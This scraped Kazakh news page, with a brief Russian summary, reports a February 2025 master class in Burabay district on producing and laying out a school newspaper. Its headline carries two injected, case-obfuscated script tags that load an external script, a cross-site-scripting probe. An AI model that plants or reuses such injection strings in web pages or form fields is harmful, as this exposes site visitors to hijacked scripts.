Мектеп газетін жасау және макетін жасау бойынша шеберлік сыныбы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.02.2025

ҚР Президенті Қ. Тоқаевтың Жарлығымен 2 ақпан – ұлттық Баспасөз күні болып белгіленді. Себебі, 1913 жылғы 2 ақпан күні «Қазақ» газетінің тұңғыш саны жарық көрген еді. Осы күнге орай, «Тұран» орталығында тәлімгерлер мен жас тілшілердің басын қосқан шеберлік сабағы өткізілді.
Бурабай ауданы білім беру ұйымдарының мектеп баспасөз қызметін жүргізушілер шеберлік сабағына белсенді қатысты. Щучинск қаласының №5 ЖБМ аға тәлімгері Дзейтова Наталья Александровна өз мектептерінің газетін мысалға ала отырып, газетті қалай дұрыс беттеу керектігін түсіндірді.
«Арман» БЖШО жанынан шығатын «Арман» балалар мен жасөспірімдерге арналған газеттің редакторы Егембердиева Ляззат Картаевна газетті беттеу кезінде жиі жіберілетін техникалық қателіктерге тоқталып, оны болдырмау жолдарын түсіндірді.
Теориялық тұрғыдан сабақ алған оқушылар газетті беттеу үшін практикалық бөлімге көшті. Үш топқа бөлінген соң, әрқайсысы өз газеттерінің атауын, осы санда жарық көруге тиісті материалдарды, оларды қалай орналастыру керектігін ойластырды.
Жас тілшілер өздеріне көп пайдалы ақпарат алғандары, көптеген жаңаша тәсілдерді үйренгендері туралы айтып, ұйымдастырушыларға алғыстарын білдірді.

Сегодня в Центре досуга подростков Туран состоялся мастер класс по созданию и вёрстке школьной газеты.
В мастер классе приняли участие вожатые школ города и лидеры ( министры печати)

Просмотров: 122


Пікір қосу



Деректерді қолтаңбаға қосу